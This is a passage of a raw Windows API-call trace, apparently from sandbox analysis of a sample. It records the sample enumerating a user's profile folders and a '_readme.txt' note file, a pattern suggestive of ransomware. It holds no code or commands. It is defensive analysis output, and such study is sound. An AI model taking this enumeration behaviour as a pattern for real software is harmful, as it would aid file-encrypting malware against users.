ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0209.919] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x32409b0 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240a08 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x54) returned 0x327a528 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240c18 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d598 [0209.920] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x32409b0 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240a08 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x70) returned 0x32405b0 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240c70 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d668 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240cc8 [0209.920] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xbe74d9e0, ftLastAccessTime.dwHighDateTime=0x1d5ff3b, ftLastWriteTime.dwLowDateTime=0xbe74d9e0, ftLastWriteTime.dwHighDateTime=0x1d5ff3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x32409b0 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240a08 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xa8) returned 0x32311e8 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240c18 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d598 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240d20 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240d78 [0209.920] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd99ba3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd99ba3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x32409b0 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x76) returned 0x7bcdd8 [0209.920] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0209.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x32409b0 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x76) returned 0x7bcdd8 [0209.921] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240b10 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x76) returned 0x7bcdd8 [0209.921] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240b10 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240d78 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240d20 [0209.921] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d668 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x3a87078 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x16c) returned 0x7bfd68 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240b10 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x3a870e0 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240d78 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240c18 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240dd0 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x3a87148 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x3a871b0 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x3a87218 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240e28 [0209.921] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9a2c7e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9a2c7e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240d20 [0209.921] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240c70 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240cc8 [0209.922] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d668 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d600 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d738 [0209.922] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240d20 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240c70 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240a08 [0209.922] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xee09d200, ftLastAccessTime.dwHighDateTime=0x1d5ff3b, ftLastWriteTime.dwLowDateTime=0xee09d200, ftLastWriteTime.dwHighDateTime=0x1d5ff3b, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0209.922] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xee050f40, ftLastWriteTime.dwHighDateTime=0x1d5ff3b, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0209.922] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0209.922] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0209.922] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0209.922] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0209.922] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0209.922] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9c67c80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9c67c80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240d20 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240c70 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x214) returned 0x32efd40 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x32409b0 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d668 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240e80 [0209.922] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240ed8 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240f30 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d600 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d6d0 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x3a87078 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240f88 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x3a87280 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240fe0 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x3a872e8 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3241038 [0209.923] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240d20 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x76) returned 0x7bcdd8 [0209.923] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240d20 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240c70 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240cc8 [0209.923] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d738 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x3a87218 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x3a871b0 [0209.923] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240d20 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240c70 [0209.923] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240e28 [0209.923] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0209.924] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240d20 [0209.924] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240c70 [0209.924] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240dd0 [0209.924] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0209.924] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d738 [0209.924] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x3a87218 [0209.924] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0209.924] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9bcf700, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9bcf700, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0209.924] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cb6dd40, ftCreationTime.dwHighDateTime=0x1d5ff3c, ftLastAccessTime.dwLowDateTime=0x2cb6dd40, ftLastAccessTime.dwHighDateTime=0x1d5ff3c, ftLastWriteTime.dwLowDateTime=0x2cb6dd40, ftLastWriteTime.dwHighDateTime=0x1d5ff3c, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0209.924] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cb6dd40, ftCreationTime.dwHighDateTime=0x1d5ff3c, ftLastAccessTime.dwLowDateTime=0x2cb6dd40, ftLastAccessTime.dwHighDateTime=0x1d5ff3c, ftLastWriteTime.dwLowDateTime=0x2cb6dd40, ftLastWriteTime.dwHighDateTime=0x1d5ff3c, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0209.924] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.924] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.924] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0209.925] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.925] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.925] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.925] PathFindFileNameW (pszPath="") returned="" [0209.925] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.925] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, 